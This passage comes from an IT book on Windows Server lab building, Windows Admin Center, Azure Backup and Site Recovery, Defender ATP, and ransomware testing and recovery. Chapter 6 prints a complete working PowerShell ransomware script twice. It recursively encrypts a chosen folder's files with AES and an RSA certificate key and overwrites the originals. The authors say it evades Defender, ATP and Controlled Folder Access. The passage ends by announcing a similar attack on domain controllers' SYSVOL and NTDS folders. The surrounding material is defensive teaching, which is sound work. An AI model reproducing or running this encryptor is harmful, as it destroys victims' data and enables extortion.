4. Next Download a copy of Windows Server Insider 17079 Microsoft Eval Center. For our lab, we have a drive on our Hyper-V Host F:\ Save the ISO to F:\DCBuild_Insider 5. Copy BigDemo_Insider.PS1 from C:\Post-Install to F:\DCBuild_Insider

6. Open BigDemo_Insider.PS1 with the PowerShell ISE edit lines 425 and 434 putting in Your Product key received with the EVAL Version of Windows Server 2016 Downloaded above 7. Edit line 422 $ServerISO with the actual path and name of your Server ISO 92

https://blogs.windows.com/windowsexperience/2018/01/23/an nouncing-windows-server-insider-preview-build-17079/

Chapter 3 Using BigDemo to Build your Lab

Downloaded which should have been downloaded to something like F:\DCBuild_Insider Save BigDemo_Insider.PS1 8. Open an administrative PowerShell prompt. Run BigDemo_Insider.PS1 For this book we have used the following parameters: WorkingDir: f:\DCBuild_Insider Organization: MVPDays Rockstars Owner: Dave Kawula TimeZone: Mountain Standard Time AdminPassword: P@ssw0rd DomainName: MVPDays.com DomainAdminPassword: 93

Chapter 3 Using BigDemo to Build your Lab

P@ssw0rd VirtualSwitchName: MVPDays_VMM_VSwitch Subnet: 172.16.100. ExtraLabFiles: C:\ 9. It will take approximately 1 hour to build the Lab Environment

With BigDemo you can create a new Lab Environment on demand. This script has built out Active Directory, DHCP, DNS, and the other core infrastructure components required to get started with your lab. 94

Chapter 4 Configuring Windows Admin Center

Chapter 4

Configuring Windows Admin Center In this chapter, we will look at setting up Windows Admin Center in the Lab. We have already installed Windows Admin Center and will start with the basic configurations. For your reference, we used the following PowerShell Function during provisioning to Download and Installed Windows Admin Center to the Management Virtual Machine.

Function Install-WindowsAdminCenter { param ( [string]$VMName, [string]$GuestOSName, [string]$VMPath, [string]$WorkingDir )

#Download Windows Admin Center to c:\post-install

Invoke-Command -VMName $VMName -Credential $domainCred { New-Item -ItemType Directory -Path "c:\Post-Install" -Force:$true | OutNull Write-Output "Downloading Windows Admin Center" #Ping the internet to get things working in the lab ping www.google.com

95

Chapter 4 Configuring Windows Admin Center

Invoke-WebRequest -UseBasicParsing -Uri https://aka.ms/WACDownload -OutFile "c:\Post-Install\WindowsAdminCenter.msi"

Write-Output "Installing Windows Admin Center" Start-Process msiexec.exe -Wait -ArgumentList "/i c:\postinstall\WindowsAdminCenter.msi /qn /L*v log.txt SME_PORT=6516 SSL_CERTIFICATE_OPTION=generate"

}

}

Install Google Chrome and Mozilla FireFox You are probably wondering why we would install Google Chrome and Mozilla Firefox in the lab. The answer is very simple, and in short, it is because Microsoft Edge does not ship with the Server Operating Systems and we cannot configure Windows Admin Center without an alternate browser. Once we have things initially configured, we could easily use Edge from another Windows 10 Desktop.

Instructions

1. Logon to Management01 as Administrator

96

Screenshot (if applicable)

Chapter 4 Configuring Windows Admin Center

2. Download and Install Google Chorme and Mozilla Firefox

Configure Windows Admin Center In the following steps, we will configure Windows Admin Center with the base configurations.

Instructions

Screenshot (if applicable)

1. Logon to Management01 as Administrator 97

Chapter 4 Configuring Windows Admin Center

2. Open FireFox and browse to https://localhost:6516 3. Click Advanced and accept the Security Warnings to continue.

4. Logon with Domain Admin Credentials 5. Click on Skip Tour

98

Chapter 4 Configuring Windows Admin Center

6. Click on Management01

7. Verify that Windows Admin Center connects and is working

8.

Configure Azure Integration In these steps, we will configure Microsoft Azure Integration with Windows Admin Center. These steps are required to configure Hybrid Services such as Azure Backup and Azure Site Recovery.

Instructions

Screenshot (if applicable)

99

Chapter 4 Configuring Windows Admin Center

1. Logon to Management01 as Administrator 2. Open FireFox and browse to https://localhost:6516 3. Click Advanced and accept the Security Warnings to continue.

4. Logon with Domain Admin Credentials 5. Click on the Settings Wheel in the top right corner of Windows Admin Center 6. Verify that Windows Admin Center connects and is working

100

Chapter 4 Configuring Windows Admin Center

7. Click on Azure option in the Menu. Then Click register.

8. On the Register, the gateway with Azure click Copy Code and click Device Logon

9. On the Device, Logon screen paste the code and click Continue

101

Chapter 4 Configuring Windows Admin Center

10. Sign In with your Azure tenant Credentials

11. Close the Microsoft Azure PowerShell Window as prompted.

12. Select your tenant ID and click Register. If you don’t know what your tenant ID is you can click 102

Chapter 4 Configuring Windows Admin Center

on Azure Active Directory and click Properties. 13. Verify that you see the message successfully registered with Azure Active Directory. 14. Click on Go to Azure AD app Registration

15. On the Azure App Settings Page Click Settings and then click Required Permissions

103

Chapter 4 Configuring Windows Admin Center

16. Click Grant Permissions and click Yes

17. Once completed click the close button in Windows Admin Center.

Configure Azure Backup In these steps, we will test Azure Hybrid integration by setting up Azure Backup on the Management Server.

Instructions

1. Logon to Management01 as Administrator

104

Screenshot (if applicable)

Chapter 4 Configuring Windows Admin Center

2. Open FireFox and browse to https://localhost:6516 3. Click Advanced and accept the Security Warnings to continue.

4. Logon with Domain Admin Credentials 5. Click on Mangement01

6. Click on Backup and click on Setup Azure Backup

105

Chapter 4 Configuring Windows Admin Center

7. On the Azure, Backup tab Click on Login and Login

8. On the Setup Azure Backup page click Step 2, Show Details, Change the region to your local region

9. On Step 3 Select c:\ and System State

10. On Step 3 confirm the Backup Schedule

106

Chapter 4 Configuring Windows Admin Center

11. On Step 4 – Enter an Encryption Passphrase

12. Click Apply

13. Wait while your recovery vault is created Note: Windows Admin Center will create a new recovery Vault for each machine that is protected. This is configured this way to avoid throttling of the accounts. 14. Wait until the Azure Backup setup is complete before changing tabs.

107

Chapter 4 Configuring Windows Admin Center

15. Once complete verify the settings. Note: This is a great way to test Windows Admin Center integration.

16. Test the Backup to the Recovery Vault by clicking Backup Now

108

Chapter 4 Configuring Windows Admin Center

17. Choose Files and Folders and click Backup

18. You will notice that a job has kicked off for the backup

109

Chapter 4 Configuring Windows Admin Center

19. You will notice that a job backup is in progress

Verifying Backups locally with the Backup Microsoft Azure Backup Agent We can check the status of our Azure Backups with the local Azure Backup Agent that has been installed from Windows Admin Center.

Instructions

1. Logon to Management01 as Administrator

110

Screenshot (if applicable)

Chapter 4 Configuring Windows Admin Center

2. On the desktop click on Microsoft Azure Backup

3. Verify your backups or jobs in progress locally here

111

Chapter 4 Configuring Windows Admin Center

Configuring Windows Azure Update Management An important part of our Ransomware defense strategy is keeping updated with Windows Updates and Rollups. This can be easily accomplished by integrating Windows Admin Center with Azure Update Management. In the following steps, we will show you how to setup Azure Update Management to keep your servers up to date.

Instructions

1. Logon to Management01 as Administrator 2. Open FireFox and browse to https://localhost:6516 3. Click Advanced and accept the Security Warnings to continue.

4. Logon with Domain Admin Credentials

112

Screenshot (if applicable)

Chapter 4 Configuring Windows Admin Center

5. Click on Mangement01

6. Click on Updates and then click on Centrally Manage updates on all your servers by using Azure Update Management (Set up now)

113

Chapter 4 Configuring Windows Admin Center

7. On the Setup Azure Update Management tab, Choose your Subscription. 8. Create a new Resource Group 9. Choose a Region 10. Create a new Log Analytics Workspace 11. Create a new Azure Automation Accounts and click Set Up

114

Chapter 4 Configuring Windows Admin Center

115

Chapter 4 Configuring Windows Admin Center

12. View the progress by checking notification details

13. Once completed you should see a success status message

116

Chapter 4 Configuring Windows Admin Center

14. Once setup is complete click on Manage in Azure

15. You will see your server show up in Azure Update Management

16. Next click on Schule Update Deployment 17. On Name type: Daily Updates

117

Chapter 4 Configuring Windows Admin Center

18. Complete the deployment settings and select Management 01

118

Chapter 4 Configuring Windows Admin Center

19. Once complete you can see that the updates are managed by Azure Updates

Configure Azure Site Recovery An important part of our Ransomware defense strategy is having an update to date Disaster Recovery Solution. In the event of a Ransomware attack, the only option might be recovering to a DR Site like Azure.

Instructions

Screenshot (if applicable)

1. Logon to Management01 as Administrator

119

Chapter 4 Configuring Windows Admin Center

2. Open FireFox and browse to https://localhost:6516 3. Click Advanced and accept the Security Warnings to continue.

4. Logon with Domain Admin Credentials 5. Click on drtitan01

6. Click on Virtual Machines and click on Help Protect your VMs from disasters by using Azure Site Recovery (Set up Now)

120

Chapter 4 Configuring Windows Admin Center

7. ON the Set up host with Azure Site Recovery choose your subscription. 8. Select a Resource Group 9. Create a new Recovery Services Vault and click Set up ASR

121

Chapter 4 Configuring Windows Admin Center

10. Verify the progress

11. Verify the progress

12. On the inventory tab, you can see the Status for Disaster Recovery Change once ready.

122

Chapter 4 Configuring Windows Admin Center

13. Configure Azure Site Recovery protection for FS01. Select FS01 click More and click Protect VM

123

Chapter 4 Configuring Windows Admin Center

14. On the Protect FS01 with Azure Site Recovery, window create a new Storage Account called asrdrtitanstorage 15. Click Protect VM

16.

124

Chapter 4 Configuring Windows Admin Center

Upgrade to Security Center Standard in Azure To start seeing metric and use security center we will need to either start a trial or sign up for Security Center Standard.

Instructions

Screenshot (if applicable)

1. Open you Azure Portal and browse to Security Center, Getting Started, Click on asrransomwarelogs and click Upgrade

2. Once Upgraded you will see the checkmark on Ugpraded 3.

125

Chapter 4 Configuring Windows Admin Center

126

Chapter 5 Windows Defender Advanced Threat Protection ATP

Chapter 5

Windows Defender Advanced Threat Protection ATP Windows Defender Advanced Threat Protection (ATP) is an extremely useful add-on to help protect your Windows Servers. This tool gives the capabilities of Windows Defender that is included with Windows Server 2019.

In this chapter, we will give a brief overview of some of the features. To start things off, you will need to sign up for a trial here: https://www.microsoft.com/enus/WindowsForBusiness/windows-atp?ocid=docs-wdatp-portaloverview-abovefoldlink

127

Chapter 5 Windows Defender Advanced Threat Protection ATP

Onboarding a Server with Windows Defender ATP

Instructions

1. Browse to https://securitycenter.win dows.com/dashboard 2. Log in with your Admin Credentials

128

Screenshot (if applicable)

Chapter 5 Windows Defender Advanced Threat Protection ATP

3. Click on the Settings Wheel, and scroll down to Machine Mangement 4. You will notice that there are many different deployment options from local installation, Group Policy, Configuration Manager, etc. 5. Choose Local Script 6. Download the Deployment Package to the Target Server Management 01 7. Open an Administrative Command Prompt and run WindowsDefenderATPLoc alOnboardingSCript.cmd 8. Wait approximately 5 minutes and check the machines List in the Portal

129

Chapter 5 Windows Defender Advanced Threat Protection ATP

Reviewing an Incident with Windows Defender Advanced Threat Protection

Instructions

1. Browse to https://securitycenter.win dows.com/dashboard 2. Log in with your Admin Credentials

3. Here we can see that our machine Management01 has had Occamy Malware detected. We will look at this attack later in the book.

130

Screenshot (if applicable)

Chapter 5 Windows Defender Advanced Threat Protection ATP

4. If we scroll down on the machine, we can see a timeline of the infection

5. We can also drill into the alert giving more information about the incident

131

Chapter 5 Windows Defender Advanced Threat Protection ATP

6. We can also see an incident Graph

7. We can also drill into the live investigation that took place for this incident

132

Chapter 6 Simulating a Ransomware Attack

Chapter 6

Simulating a Ransomware Attack

KnowBe4 Ransomware Simulator on Windows Server 2019 RanSim will simulate 13 ransomware infection scenarios and 1 crypto mining infection scenario and show you if a workstation is vulnerable.

Instructions

Screenshot (if applicable)

133

Chapter 6 Simulating a Ransomware Attack

1. In Order to initially test the Ransomware Simulator we are going to have to turn off Windows Defender Protection on our Windows Server 2019 machine Management01. If you don’t do this the installation of the Ransomware Simulator will fail.

2. Download the Knowbe4 Ransomware Simulator from https://www.knowbe4.co m/ransomware-simulator 3. Run SimulatorSetup.exe and click install

134

Chapter 6 Simulating a Ransomware Attack

4. Once Setup has completed close the installation window. 5.

6. The files for the installation are located in c:\users\administrator.ms smoa\appdata\ 7. This is where the temp files are stored for testing during the Ransomware tests

135

Chapter 6 Simulating a Ransomware Attack

8. On the KnowBe4 Ransomware Simulator window click launch

136

Chapter 6 Simulating a Ransomware Attack

9. On the KnowBe4 Ransim window click Launch

10. We will launch the attack initially with Defender Disabled and see what happens 11. You will see a test folder get created you don’t see this when Windows Defender is enabled

137

Chapter 6 Simulating a Ransomware Attack

12. You will be able to see the files being encrypted real time in here.

13. We can see that 14/14 scenarios succeeded with Windows Defender Off

138

Chapter 6 Simulating a Ransomware Attack

14. Now let us turn Windows Defender Protection Back on

15. Re-Run the tests this time with protection enabled 16. You can see right away Windows Defender found a problem

139

Chapter 6 Simulating a Ransomware Attack

17. We can see the the Trojan.Win32/Ocamy.C was found

18. One of the things that I noticed when Defender was enabled was that the Ransomware Tool was very slow and unresponsive.

140

Chapter 6 Simulating a Ransomware Attack

19. And we can see that after a long period of time none of these attacks succeeded directly on the server

Enabling Ransomware Protection on Windows Server 2019 A new Feature with Windows Server 2019 is Ransomware Protection. In the following steps, we will re-run the tests with Ransomware Simulator Ransim and see the output.

Instructions

Screenshot (if applicable)

141

Chapter 6 Simulating a Ransomware Attack

1. Open Windows Security and clock on Ransomware Protection 2. Click on manage Ransomware Protection

3. Turn On Controlled Folder access

142

Chapter 6 Simulating a Ransomware Attack

4. Click on Protected Folders to see what folders are protected by default 5. Click on Add Protected Folder and Add C:\Users\Administrator.M MSMOA\appdata\local\R nSimulator

143

Chapter 6 Simulating a Ransomware Attack

6. Re-Run the RanSim tests

7. Right away a new popup showed that Unauthorized Changes Blocked collector.exe from making changes

8. Moreover, we can see that after a longperiod none of these attacks succeeded directly on the server

144

Chapter 6 Simulating a Ransomware Attack

Executing a Ransomware Attack with PowerShell The code below is only to be used for testing purposes. DO Not run this in a production environment. None of the authors of this book take any responsibility for your actions. Windows Defender will not pick this attack up because it was executed with Administrative Credentials. This means that in this case, you are now the victim of a Ransomware Attack.

Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath #global variables $csv = "C:\windows\temp\drives.csv" #Define the cert to use for encryption #Create your own cert with this command; New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local $Cert = $(Get-ChildItem Cert:\LocalMachine\My\60BD2E50C9EB3937CB3DA6FBF2C5ACC925F3C00A) $Cert #discover the other folders beneath the selectedpath $FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) -and ( $_.Name -like "*$fileName*") } | % {$_.FullName} -ErrorAction SilentlyContinue $FilestoEncrypt Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509C ertificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography" ) } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())

145

Chapter 6 Simulating a Ransomware Attack

[Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force } #Encrypt each file foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue } Exit

146

Chapter 6 Simulating a Ransomware Attack

Instructions

1. Open PowerShell ISE and run as Administrator 2. Run this code to select the target folder. We will use one of the sample RanSIm Folders. 3. C:\Users\Administrator.M MSMOA\appdata\local\R nSimulator\TestFolder\Te sts\1-Tests

Screenshot (if applicable)

Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath

4. Select the folder and click ok

147

Chapter 6 Simulating a Ransomware Attack

5. Create a new Self Signed Certificate 6. Copy the thumbprint to the clipboard

New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local

7. Run the following to put the Certificate into the $Cert Variable

$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C 89DA4DBCD) $Cert

8. Then Grab the files from the folder

$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} ErrorAction SilentlyContinue $FilestoEncrypt

9. Run the Encrypt-File Function

Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo ]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptogr aphy.X509Certificates.X509Certificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("Sy stem.Security.Cryptography") } Catch { Write-Error "Could not load required assembly."; Return }

148

Chapter 6 Simulating a Ransomware Attack

$AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeForma tter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam e)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStream Writer, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Writ e) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count)

149

Chapter 6 Simulating a Ransomware Attack

$BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force }

10. Try Encrypting your files

150

foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue }

Chapter 6 Simulating a Ransomware Attack

11. The Ransomware attack was successful and bypassed Windows Defender, ATP, and Ransomware Protection

12. I renamed one of the files and took the .exe off the end it is indeed encrypted.

151

Chapter 7 Recovering from Ransomware using Azure Site Recovery

Chapter 7

Recovering from Ransomware using Azure Site Recovery Notes from the Field Why Airgapped Replicas are the only choice So what is air gapped backup anyways? Here is what Wikipedia has to say: An air gap, air wall or air gapping is a network security measure employed on one or more computers to ensure that a secure computer network is physically isolated from unsecured networks, such as the public Internet or an unsecured local area network. It means a computer or network has no network interfaces connected to other networks, with a physical or conceptual air gap, analogous to the air gap used in plumbing to maintain water quality. In lay man’s terms, it means that you must keep a copy of you Backups and replicas offline.

Why Planned Failover is no longer an option Planned Failover is the normal process of failing over to replica recovery points at a different location. What the planned failover process does is the following:

1. Once kicked off it takes a final sync of the source machines 2. Then once replication completes it turns off the Source Virtual Machine 152

Chapter 7 Recovering from Ransomware using Azure Site Recovery

3. At this point, it takes one final sync to capture the remaining changes. This can only be done once the Virtual is off. Think of a SQL Server or Exchange Server that were processing transactions during the 1st sync. The system cannot guarantee all of the records are there until the Virtual Machine is off. That is why it shuts down the source machine to complete the final delta sync. 4. Once the Sync is completed the Virtual Machine is powered on in your Microsoft Azure Tenant.

Why will this not work in a Ransomware Situation? Because if the source machine was infected and the files were encrypted you just too the encrypted files up to Azure and turned on the Virtual Machine.

Failover Now is the only Option With the Planned Failover process not viable for us the only option is to use the Failover Now or Failover option. This will allow us to select a point in time to simply power on the Virtual Machine. 1. The steps to perform Failover Now are easier and faster than a planned failover. First, you choose the Virtual Machine from the Azure Recovery Vault. 2. Next, you select the Failover button 3. Choose the restore point 4. Turn on the VM The total amount of time to turn on an air gapped replica virtual machine is minutes.

Watch you Six (Clock) When dealing with a ransomware incident, nobody is going to have your back. You do not have the luxury of time when it comes to a ransomware attack. If you had configured a maximum of 30 restore points in Azure the clock is ticking. If the source Virtual Machine is still on your Azure 153

Chapter 7 Recovering from Ransomware using Azure Site Recovery

Site Recovery jobs are still bringing the nonviable recovery points into your vault. If you out run the number of restore points and all you have is infected or cryptoed files, then Azure Site Recovery was pointless.

Do not connect your Azure Site Recovery Virtual Machines to a live Site-to-Site VPN There is a big difference between traditional Disaster Recovery protection and the level of protection that is required to survive a ransomware attack. Think of it this way if you run a live Domain Controller in the cloud like many of us do. What happens when we have a live incident, and the source on-prem side is compromised. Do you think that Azure Virtual Machine running as a domain controller is safe? Earlier in the book, we showed you what an admin level ransomware attack looked like for core infrastructure roles like Domain Controllers. What this means for you is that you must keep tight control and maintain the “Air Gap” between your on-prem infrastructure and the cloud. Once you have safely recovered to a previous recovery point and cleaned up the on-prem side at that point, you will be able to setup a Site-to-Site VPN to give users access.

When can I get back into my data? Oh, do I love the phone calls of people screaming at me wondering when they will be able to get their data back? What they don’t understand is they are lucky that we have any data at all. If you didn’t have an air-gapped backup and dr solution you could be looking at something like this:

Dear CEO, I think it is the time that we notify the public of the breach that has occurred on 04/13/2019. None of our services will be viable for the next foreseeable future. You should look at issuing a public statement and having our teams contact our business partners. Those million dollar shipment of supplies will not be arriving on time. Blah Blah

154

Chapter 7 Recovering from Ransomware using Azure Site Recovery

If you think that this situation doesn’t happen, you are dead wrong. If you ask a room of IT Professionals how many have been impacted by some type of Ransomware attack in the past 3 years most of them would put their hands up.

So, the short answer to the question “When can I get my data back is?” is as soon as we can.

Trust me the on this one point my friends that if you have an option of nothing or a recovery point that is 24 or 48 hours old. The business will be extremely thankful that they have something to keep going. The pain staking process of rekeying data in a Ransomware Attack is something that you won’t be able to overcome. Our first and primary concern is getting them back at all.

Ok, so I didn’t listen and lost everything now what? If you didn’t have an air-gapped solution and you lost everything now what. Well, it because of one giant salvage operation. Starting here: 1. Rebuilding Core Infrastructure Roles a. Active Directory b. DNS c. DHCP 2. Rebuilding all the Workstations 3. Rebuild SQL, Exchange, SharePoint 4. Praying our backups to go back far enough

You are talking about weeks if not months of downtime for some of these services if not all of them. 155

Chapter 7 Recovering from Ransomware using Azure Site Recovery

5. The steps to perform Failover Now are easier and faster than a planned failover. First, you choose the Virtual Machine from the Azure Recovery Vault. 6. Next, you select the Failover button 7. Choose the restore point 8. Turn on the VM The total amount of time to turn on an air gapped replica virtual machine is minutes.

Don’t forget to tune your Replication Policy Your Replication Policy will determine how many recovery points you have available. What does this mean to you the IT PRO our Cloud Admin? It means that this is the amount of time you have to make a decision when a Ransomware attack occurs. If you only have 7 days worth of recovery points in the cloud, it means you have maximum 7 days to make a decision. You cannot take the weekend off if you get a ransomware attack. You must act immediately and make a decision. This nice part about being able to recover in the cloud is you can actually recover offline and not directly connect back to the core infrastructure.

Testing Failover can be a quick Ransomware Fix Using the Test Failover option can be a very quick ransomware fix for your organization. With this option, you can quickly create a portable environment to either get files back or to check the viability of your Azure Site Recovery Points. We often recommend to our clients that they 156

Chapter 7 Recovering from Ransomware using Azure Site Recovery

should be testing their Recovery Points Quarterly. This is safe to do in an offline environment and doesn’t take that long to complete

Reset Settings for your Azure Site Recovery Hyper-V Host Sometimes it can be difficult to add hosts from Windows Admin Center into Asure Site Recovery. The following script will help take care of error messages like this.

157

Chapter 7 Recovering from Ransomware using Azure Site Recovery

158

Chapter 7 Recovering from Ransomware using Azure Site Recovery

To resolve the issue I had to run a Reset Script on the host to wipe all the settings.

pushd . try { $windowsIdentity=[System.Security.Principal.WindowsIdentity]::GetCurrent() $principal=new-object System.Security.Principal.WindowsPrincipal($windowsIdentity) $administrators=[System.Security.Principal.WindowsBuiltInRole]::Administrat or $isAdmin=$principal.IsInRole($administrators) if (!$isAdmin) { "Please run the script as an administrator in elevated mode." $choice = Read-Host return; } $error.Clear() "This script will remove the old Azure Site Recovery Provider related properties. Do you want to continue (Y/N) ?" $choice = Read-Host if (!($choice -eq 'Y' -or $choice -eq 'y')) { "Stopping cleanup." return; } $serviceName = "dra" $service = Get-Service -Name $serviceName

159

Chapter 7 Recovering from Ransomware using Azure Site Recovery

if ($service.Status -eq "Running") { "Stopping the Azure Site Recovery service..." net stop $serviceName } $asrHivePath = "HKLM:\SOFTWARE\Microsoft\Azure Site Recovery" $registrationPath = $asrHivePath + '\Registration' $proxySettingsPath = $asrHivePath + '\ProxySettings' $draIdvalue = 'DraID' $idMgmtCloudContainerId='IdMgmtCloudContainerId'

if (Test-Path $asrHivePath) { if (Test-Path $registrationPath) { "Removing registration related registry keys." Remove-Item -Recurse -Path $registrationPath } if (Test-Path $proxySettingsPath) { "Removing proxy settings" Remove-Item -Recurse -Path $proxySettingsPath } $regNode = Get-ItemProperty -Path $asrHivePath if($regNode.DraID -ne $null) { "Removing DraId" Remove-ItemProperty -Path $asrHivePath -Name $draIdValue } if($regNode.IdMgmtCloudContainerId -ne $null) { "Removing IdMgmtCloudContainerId"

160

Chapter 7 Recovering from Ransomware using Azure Site Recovery

Remove-ItemProperty -Path $asrHivePath -Name $idMgmtCloudContainerId } "Registry keys removed." } # First retrieve all the certificates to be deleted $ASRcerts = Get-ChildItem -Path cert:\localmachine\my | whereobject {$_.friendlyname.startswith('ASR_SRSAUTH_CERT_KEY_CONTAINER') -or $_.friendlyname.startswith('ASR_HYPER_V_HOST_CERT_KEY_CONTAINER')} # Open a cert store object $store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine" ) $store.Open('ReadWrite') # Delete the certs "Removing all related certificates" foreach ($cert in $ASRcerts) { $store.Remove($cert) } }catch { [system.exception] Write-Host "Error occurred" -ForegroundColor "Red" $error[0] Write-Host "FAILED" -ForegroundColor "Red" } popd

161

Chapter 7 Recovering from Ransomware using Azure Site Recovery

Enable Diagnostic Logging for Azure Site Recovery To enable debug logging for the ASR Provider, use the following steps:

Open an elevated PowerShell Window and then run the following commands to create your trace definition: logman create trace ASRDebug -v mmddhhmm -o C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow -y logman update ASRDebug -p "Microsoft-Azure Site RecoveryProvider" 0x8000000000000000 0x5 logman update ASRDebug -p "MicrosoftAzureRecoveryServices" 0xC000000000000000 0x5

Note: The default location specified above is C:\temp. You may safely change this value if needed. The folder will be created if it does not exist. Start the trace by typing the following command in the elevated Windows PowerShell window: logman start ASRDebug

Reproduce your issue. As soon as you reproduce your issue, stop the trace by typing the following command: logman stop ASRDebug

Convert the trace to readable text, type netsh trace convert

Collect debug logs from the folder \Temp. The default location will be C:\Program Files\Microsoft Azure Recovery Services Agent\Temp.

162

Chapter 7 Recovering from Ransomware using Azure Site Recovery

Zero Day time to Failover

Assuming an Admin Level breach Failing over 100 % to Azure In this scenario, we are going to look at an attack that takes place directly on your Domain Controllers. This is the worst case for a Ransomware type attack because the attacker is not looking for an immediate payment they have hacked into your system and are directly executing the attack. Note: This scenario takes place based on real-life events that took place 2 years ago. The client in question had their Admin credentials compromised from an online cloud backup provider. The attackers gained access to the backups and were able to crack the NTDS. Dit (Active Directory Database) offline. Then at their leisure could they come in and out. They executed this sophisticated attack on the customer’s busiest day of the year.

To showcase an attack like this, we are going to use PowerShell with Administrative privileges. You will notice how none of Windows Defenders protection polices catch this. We will do two things in this attack: First, we will encrypt the Sysvol folder on a single domain controller. Second, we will take down Active Directory by encrypting the c:\Windows\NTDS folder on each domain controller.

All of these steps were performed in a lab environment. Please do not try any of these steps in production.

Executing a PowerShell based Ransomware Attack on Domain Controllers. 163

Chapter 7 Recovering from Ransomware using Azure Site Recovery

The code below is to only be used for testing purposes. DO Not run this in a production environment. None of the authors of this book take any responsibility for your actions. Windows Defender will not pick this attack up because it was executed with Administrative Credentials. This means that in this case, you are now the victim of a Ransomware Attack.

